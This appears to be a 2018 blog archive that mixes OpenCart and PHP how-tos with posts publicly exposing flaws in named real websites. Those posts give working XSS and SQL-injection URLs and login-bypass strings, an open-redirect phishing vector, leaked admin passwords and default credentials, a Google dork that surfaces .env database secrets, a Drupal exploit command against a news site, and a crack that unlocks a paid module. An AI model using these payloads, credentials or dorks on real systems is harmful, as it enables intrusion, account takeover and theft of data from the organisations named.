Showing posts from 2018

How to edit the settings in Opencart 2.x (php)

IMPORTANT NOTE: editSetting() will delete ALL the previous settings. In OpenCart it's usually used in the configuration page to get all the data in one "post" request. This sample is for the module 'accountdisabler' - replace 'accountdisabler' with your own module name. Also the key string (ex. 'accountautodisabler_days') must start with your module name.
//Loading the model
$this->load->model('setting/setting');
//setting data for our module
$aadata = array('accountautodisabler_days' => '60');
//editing
$this->model_setting_setting->editSetting('accountautodisabler', $aadata);
In this example it saves data for the main/first store (with id 0).
An example to store multiple values that are serialized in the database
//Loading the model
$this->load->model('setting/setting');
//setting data for our module
$aadata = array('accountautodisabler_days' =>

gmashop.it | xss

XSS https://www.gmashop.it/Ricerca.cfm?testo="><img onError="alert(1)" src="a" /><" archived: http://archive.is/P0OXI SQL Injection sample raising an error https://www.gmashop.it/Inside.cfm?sezione=PRODOTTI&area=PRODOTTI&mod=elenco&apmenu=partner&codpar=2'00 archived: http://archive.is/ufpwM  Error Executing Database Query. You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''00 AND LINGUA = 'IT'' at line 3 The error occurred in /var/www/html/gmashop/Query/Prodotti/SelNomePar.cfm: line 5 Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 89 Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 84 Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 1 Called from /var/www/html/gmashop/Inside.cfm: line 48 Called from /var/www/html/gmashop/Query/Prodotti/SelNo

http://www.eknam.com | xss, sql injection

http://www.eknam.com | xss, sql injection /web/htdocs/www.eknam.com/home/default_files/meta_tag_query.php /web/htdocs/www.eknam.com/home/default_files/contenuto_footer.php XSS xss can be injected in almost all the parameters. example http://www.eknam.com/blocchi_liv3.php?lingua=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22it&pagina=torte.php&class= archived: http://archive.is/5X39s

rousseau.movimento5stelle.it - movimento5stelle.it 2018 | xss, phishing, DoS, file upload

In the last days someone has already exposed sensitive information about M5S. I don't have/own/store/view that sensitive information! After the "supposed" security breach M5S told newspapers and their users that all the security problems have been "fixed" and that they are investing a lot of money in "security" with professional companies. I don't know what they are doing but, if true, they are mostly wasting their own money or that of their donors. Note that they already got an email message, some time ago, and they didn't fix the problems specified in the message and available in a previous post. --- Movable Type is still the 2009 version (we are in 2018) and they haven't updated or fixed it. Check the previous post and the CVEs! --- They added an XSS protection but they haven't fixed them (XSS) in the scripts. It's possible to create "phishing" pages (this is an example/joke). NOTE : what

marina.difesa.it | password recovery bug. Joe accounts. XSS

Malicious URLs can be generated to redirect users after login (phishing) https://supportopersonale.marina.difesa.it/login/?redirect_to=https://[phishing_site_obfuscated] Usernames can be detected by bruteforcing the password reset. There's no limit. https://supportopersonale.marina.difesa.it/password-reset/ example of working usernames: aldo giovanni giacomo Passwords can be changed with a specific bug adding in the string a second email as recipient. Various users have the password equal to the username. In the user area it's possible to do stored XSS (tested) and possibly take over other accounts (not tested). - The email addresses can be used via https://mail.marina.difesa.it and in various cases passwords are the same as those used in supportopersonale.marina.difesa.it ______________ ______________ Another website where it is possible to bruteforce users (not as the previous one) https://vrmtc.marina.difesa.it/Portal/mail_password admin

real-time tracker & vehicle alarm - RF-V7 - Manual

The website is https://gps123.org/ the old website http://trackanywhere.com/ doesn't work.

opencart multilingual seo toolkit unhide/unlock/serial/crack/whatever - on localhost

opencart multilingual seo toolkit unlock - on localhost Add at the end of \admin\view\javascript\multilingual_seo_toolkit\multilingual_seo_toolkit.min.js the following code $( document ).ajaxComplete(function() {     $('#Activation').hide();     $('#MultilingualSeoToolkit').show(); }); I just did it to use the  in localhost and there was no way to use a legit version for a customer. It's a workaround that shows the module's panel. I'm not promoting pirated stuff!!

http://www.lorenzofontana.org | attacked by a malware/bad-backlinks

Almost all the pages have bad backlinks with "cialis" related keywords. ("Cialis price canada") http://archive.is/cD6m8 ("Buy cialis london") http://archive.is/8aJf0 ... etc. Note: I have no relations with the malware or anything that happened on that site.

http://www.wordze.com | errors, path disclosure, *free* account creation

Path: /home/wordddze/ Mysql user: wordddze password: Some errors ____________ Warning: mysql_real_escape_string(): Access denied for user 'wordddze'@'localhost' (using password: NO) in /home/wordddze/public_html/index.php on line 656 Warning: mysql_real_escape_string(): A link to the server could not be established in /home/wordddze/public_html/index.php on line 656 Warning: mysql_real_escape_string(): Access denied for user 'wordddze'@'localhost' (using password: NO) in /home/wordddze/public_html/index.php on line 657 Warning: mysql_real_escape_string(): A link to the server could not be established in /home/wordddze/public_html/index.php on line 657 Warning: mysql_real_escape_string(): Access denied for user 'wordddze'@'localhost' (using password: NO) in /home/wordddze/public_html/index.php on line 658 Warning: mysql_real_escape_string(): A link to the server could not be established in /home/wordddze/public_html/inde

Install tensorflow on windows 10 - the easy way (?)

Install WinPython  (I installed WinPython-64bit-3.6.0.1Qt5) run WinPython Powershell Prompt.exe To check if you have the latest pip run: pip install --upgrade pip To install tensorflow run: pip install --upgrade tensorflow To install virtualenv (optional - virtual environment) run: pip install --upgrade virtualenv

incomedia X5 login - do not use your regular password and make sure to have php working.

possible config files res/config.php res/access.inc.php example http://www.ravennaballetstudio.it/res/access.inc.php array( 'groups' => array('xa0n99c9'), 'id' => 'h2d0n68h', 'name' => 'admin', 'password' => 'rbs', 'page' => 'email.html' ), 'cliente' => array( 'groups' => array('h2d0n68h'), 'id' => '9y754byl', 'name' => 'cliente', 'password' => 'rbs', 'page' => 'area-protetta.php' ) ); // Admins list $imSettings['access']['admins'] = array('h2d0n68h'); // Page/Users permissions $imSettings['access']['pages'] = array( '32' => array('9y754byl')); // End of file access.inc.php

president.gov.af | sql injection, xss

This is just an error with information. Do not ask for the SQLi! http://www.president.gov.af/sroot_eng.aspx?id=75 Note: Fixed (?) on 08/05/2018 sample error -------- [FormatException: Input string was not in a correct format.] System.Number.StringToNumber(String str, NumberStyles options, NumberBuffer& number, NumberFormatInfo info, Boolean parseDecimal) +7467367 System.Number.ParseInt32(String s, NumberStyles style, NumberFormatInfo info) +119 System.String.System.IConvertible.ToInt32(IFormatProvider provider) +46 System.Convert.ChangeType(Object value, Type conversionType, IFormatProvider provider) +373 System.Data.SqlClient.SqlParameter.CoerceValue(Object value, MetaType destinationType) +4870818 [FormatException: Failed to convert parameter value from a String to a Int32.] System.Data.SqlClient.SqlParameter.CoerceValue(Object value, MetaType destinationType) +4870015 System.Data.SqlClient.SqlParameter.GetCoercedValue() +32 System.Da

Poste Italiane Elsag Bailey operating manual

Download the (old) Poste Italiane operating manual. The equipment and software should no longer be in use, and there should be no problem in making this manual available for download; it was scanned before being thrown away for good. Elsag Bailey ACCESSORY SERVICES AUTOMATION SYSTEM - OPERATING GUIDE - FORWARDING/DISTRIBUTION OFFICE. Commercial equipment used: M24-XD OLIVETTI NETSTRADA 1000 OLIVETTI WS 785 OLIVETTI WS 510 OLIVETTI Microbar Barcode International AROS Sentinel 3 Green 75 DIGICOM Modem Fax 33.6 v.34+ LEXMARK 2390

st.com | sql injection, data leak

https://blog.st.com andrewroberts colinlong daniele michaelmarkowitz gerardcronin olm_writer pamelamccracken stblogadmin .. bugged plugin onesignal-free-web-push-notifications https://blog.st.com/wp-content/plugins/onesignal-free-web-push-notifications/ https://blog.st.com/wp-content/plugins/onesignal-free-web-push-notifications/readme.txt archived page: http://archive.is/1IY0F __________ https://smarter.st.com stadmin

http://devpaks.org | data leak, code injection

Some information leaked from warnings and it was easy to better understand how to inject code. Warning: Declaration of AtElementCreator::create_element($doc) should be compatible with ElementCreator::create_element($doc, $content = NULL) in /DISK2/WWW/devpaks.org/www/epf/helpers.php on line 0 Warning: Declaration of DotElementCreator::create_element($doc) should be compatible with ElementCreator::create_element($doc, $content = NULL) in /DISK2/WWW/devpaks.org/www/epf/helpers.php on line 0 Warning: Declaration of LinkElementCreator::create_element($doc, $content) should be compatible with ElementCreator::create_element($doc, $content = NULL) in /DISK2/WWW/devpaks.org/www/epf/helpers.php on line 0

http://www.brace.sinanet.apat.it/ | XSS

XSS in the login user http://www.brace.sinanet.apat.it/winair/winair_custom.avvio XSS http://www.brace.sinanet.apat.it/web/struttura.html?p_livello_1=2&p_main=web/centro.moni%22%3E%3Cscript%3Ealert(123);%3C/script%3E%3Cnone%20src=%22 http://193.206.192.215 In the errors we can see Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server Server at 193.206.192.215 Port 7778

http://www.confindustria.benevento.it/ | xss, sql injection, system compromise

simple XSS (via GET or POST) http://www.confindustria.benevento.it/moduli/ricerca/ricerca.php?campo=%3Cscript%3Ealert(document.cookie);%3C/script%3E archived (javascript that shows the cookie): http://archive.is/8WN7B Fatal error: Uncaught exception 'Zend_Db_Adapter_Exception' with message 'SQLSTATE[08004] [1040] Too many connections' in /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Adapter/Pdo/Abstract.php:138 Stack trace: #0 /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Adapter/Pdo/Mysql.php(96): Zend_Db_Adapter_Pdo_Abstract->_connect() #1 /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Adapter/Abstract.php(828): Zend_Db_Adapter_Pdo_Mysql->_connect() #2 /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Adapter/Abstract.php(898): Zend_Db_Adapter_Abstract->quote('TITOLO_ITALIANO', NULL) #3 /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Select.php(930): Zend_Db_Adapter_Abstract->quoteInto('variabile=?&#

infn.it - access to the local network

With a bit of effort, with stuff that I'm not used to, I solved the "puzzle" and it's possible to use bugs and misconfigurations to have, also thanks to public information (not a bad thing), access to the local network. /afs/lnf.infn.it/project/server/ archived error: http://archive.is/DRuA8 The error is related to this open source event management system https://github.com/indico/indico They are using Shibboleth SSO (single sign-on) federated identity management Publicly available information: Info server http://www.lnf.infn.it/Calcolo/afs/ lxgw.lnf.infn.it (open via ssh to all users) lxplus.lnf.infn.it (open via ssh only from LNF lan) - info from mit.edu https://lost-contact.mit.edu/afs/lnf.infn.it/ http://archive.is/hshNP Old information from afs7.lnf.infn.it, afs1.lnf.infn.it, afs2.lnf.infn.it, afs3.lnf.infn.it - Info servers ( old - the servers are 10+ ): http://calcolo.lnf.infn.it/index.php?option=com_content&view=article&a

iswatlab.eu - errors and old wordpress bug

Wordpress 4.7.1.0 - exploitable with content injection. To raise an error and get the path we go to the dear hello dolly. http://www.iswatlab.eu/wp-content/plugins/hello.php archived: http://archive.is/K3JUf Fatal error: Call to undefined function add_action() in /web/htdocs/www.iswatlab.eu/home/wp-content/plugins/hello.php on line 60

PHP rename folders (or files) to lowercase

A fast way to rename folders (or files - with a small modification) to lowercase.
<?php
$usrfilespath = 'yourfolder'; // folder whose sub-folders are renamed
$ToOutput = '';               // collects the final status message
if (is_dir($usrfilespath)) {
    $files = scandir($usrfilespath);
    foreach ($files as $name) {
        // skip the '.' and '..' entries and anything that is not a folder
        if ($name !== '.' && $name !== '..' && is_dir($usrfilespath . '/' . $name)) {
            // rename to the lowercase version of the same name
            rename($usrfilespath . '/' . $name, $usrfilespath . '/' . strtolower($name));
            echo $usrfilespath . '/' . $name . '<br>' . $usrfilespath . '/' . strtolower($name) . '<br><br>';
        }
    }
    $ToOutput .= 'OK: Folders renamed to lowercase<br>';
} else {
    $ToOutput .= 'ERROR: No folders to rename<br>';
}
echo $ToOutput;

slowmyfood.com | security problems

http://www.slowmyfood.com Server iis path from the errors: D:\inetpub\webs\slowmyfoodcom\ software Shopfactory there's a robots.txt in a subfolder http://www.slowmyfood.com/pub/robots.txt # robots.txt for http://ou-8918-jg.shopfactory.com/ User-agent: * Allow: * Disallow: */contents/pconfirm.html Disallow: */contents/progress.html Disallow: */contents/provider.html Disallow: */contents/reseller.html Disallow: */contents/ups.html Disallow: */contents/basket.php Disallow: */contents/*/changecurrency.html Disallow: */contents/*/customerdtl.html Disallow: */contents/*/login.html Disallow: */contents/*/orderterms.html Disallow: */contents/*/ordertotal.html Disallow: */contents/*/search.html Disallow: */contents/*/search_result.html Disallow: */contents/*/shipping_charge.html Disallow: */contents/*/thankyou.html Disallow: */contents/*/unsuccessful.html Disallow: */contents/*/V6*.html Disallow: */contents/*/website.html Sitemap: http://ou-8918-jg.shopfactory.com/sitemap.xml 

Opencart - remove scrolling when adding products and keep the notification.

Edit common.js, and make sure to use a copy in your custom theme. In header.tpl change from:
<script src="catalog/view/javascript/common.js" type="text/javascript"></script>
to:
<script src="catalog/view/theme/[yourtheme]/javascript/common.js" type="text/javascript"></script>
In catalog/view/theme/[yourtheme]/javascript/common.js comment out ( // ) all the occurrences of the following line:
//$('html, body').animate({ scrollTop: 0 }, 'slow');
In the CSS do the following:
/*add to the theme - stylesheet.css this part*/
.alert{
    position:fixed;
    width: 100%;
    top:0;
    left:0;
    z-index:10000;
}

http://servizi5.cstsannio.it | default xampp password configuration problem

The website is linked from http://www.cstsannio.it/ (AVCP in the menu) and has several security problems related to various misconfigurations. http://servizi5.cstsannio.it:8080/xampp/ archived: http://archive.is/SesIG http://servizi5.cstsannio.it:8080/xampp/phpinfo.php archived: http://archive.is/qvOhW http://servizi5.cstsannio.it:8080/xampp/security.php archived: http://archive.is/hy33G The default password for daemon is still xampp. For mysql the password of root is empty (mysqld is not running).

Ordine dei Giornalisti - http://www.odg.it https://sigef-odg.lansystems.it - Sql injection, xss, system compromise

 http://www.odg.it Old version of Drupal with several security problems. It's possible to have admin access and upload a php shell. (2019-05 the problem is still there)  https://sigef-odg.lansystems.it Access as any user via sql injection. sample injection user: ' or ''=' password: ' or ''=' (2019-05 - they tried to fix the problem the previous injection doesn't work) New injection ' or ''=''-- sample screenshot Sample error  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' and `password`=SHA2('',256) AND IFNULL(UFPC.eliminato,0) NOT IN (1,8,9)' at line 1 NOTE: I have not saved/stored any kind of confidential information and I have no criminal intents of any kind. 1958 --- 2018-04 - odg.it has been notified (2 times) of the problems via email . No reply received.

trottabenevento.it - sql injection, data leak

http://www.trottabenevento.it/login.php a' or ''=' a' or ''=' Array ( [0] => 42S02 [1] => 1146 [2] => Table 'Sql1064148_1.log' doesn't exist ) First error Array ( [0] => 42000 [1] => 1064 [2] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'a', Ip = '95.238.158.239', Note='prova con email/password errata', Pagina='/veri' at line 1 ) 

opencart 3.0.2 - How to convert older 2.x templates from tpl to twig

Converting the template from tpl to twig is fairly easy to do. Download "php2twig" slightly modified (click here), on the fly, to have a working recursive file conversion (recursive glob function from php.net comments). The original source code can be found here: https://github.com/makinacorpus/php-twig-converter Copy php2twig in your theme folder (suggested). Go to your theme folder and run the following command:
(windows) php.exe php2twig -e .tpl -ne .twig -r "c:/fullpath/to/template"
(linux) ./php2twig -e .tpl -ne .twig -r /fullpath/to/template
Save the output of php2twig to check for possible problems. The bulk of the work is mostly done by this useful script. Note: the script doesn't correctly convert the {% endfor %}.

How to change language of camtasia 9 to english (without understanding the previous language)

Windows and Mac OS: just go to your installation folder, e.g. c:\Program Files\TechSmith\Camtasia 9\ and rename the folder of the current language to anything else, or force the folder to be unusable/unwritable. For example, with German: c:\Program Files\TechSmith\Camtasia 9\de-DE The best solution is to download the trial from the official website, which is in English, and choose the language while installing.

How to get the Zend Framework

How to get the Zend Framework (1) version from a standalone file. create your index.php and echo the 'VERSION' const or just open Zend/Version.php for Zend 1 <?php    require_once 'Zend/Version.php';    echo Zend_Version::VERSION; ?> for Zend 2 <?php    require_once 'Zend/Version/Version.php';    echo Zend\Version\Version::VERSION; ?>

Dockers and Laravel (etc) .env Google Dork

Google Dork: "DB_PASSWORD" filetype:env samples www.nicn.gov.ng/funds/.env ... DB_USERNAME=sanfas93_funds ...   Cache http://webcache.googleusercontent.com/search?q=cache:MpIEuXgh8g0J:www.nicn.gov.ng/funds/.env+&cd=1&hl=it&ct=clnk&gl=it http://archive.is/QAPCN http://webcache.googleusercontent.com/search?q=cache:CTsy_8EgUX0J:www.snapnet.com.ng/support/.env+&cd=2&hl=it&ct=clnk&gl=it http://archive.is/eSLW6 http://lightscameraafrica.com/shared/.env http://archive.is/nzYvl http://www.energycom.gov.gh/cewp/.env http://archive.is/DNAlm http://www.ltleadership.org/test/.env http://archive.is/tOa6p

http://www.ilgiornale.it/ | sql injection, account creation

 Drupal sql injection and account creation python 34992 -t http://www.ilgiornale.it/ -u dop -p dop We can  raise an error to have more info Drupal PDOException : SQLSTATE[22001]: String data, right truncated: 1406 Data too long for column 'field_cap_value' at row 1: INSERT INTO {field_data_field_cap} (entity_type, entity_id, revision_id, bundle, delta, language, field_cap_value, field_cap_format) VALUES (:db_insert_placeholder_0, :db_insert_placeholder_1, :db_insert_placeholder_2, :db_insert_placeholder_3, :db_insert_placeholder_4, :db_insert_placeholder_5, :db_insert_placeholder_6, :db_insert_placeholder_7); Array ( [:db_insert_placeholder_0] => user [:db_insert_placeholder_1] => 140122 [:db_insert_placeholder_2] => 140122 [:db_insert_placeholder_3] => user [:db_insert_placeholder_4] => 0 [:db_insert_placeholder_5] => und [:db_insert_placeholder_6] => "><script>alert(1);</script><&q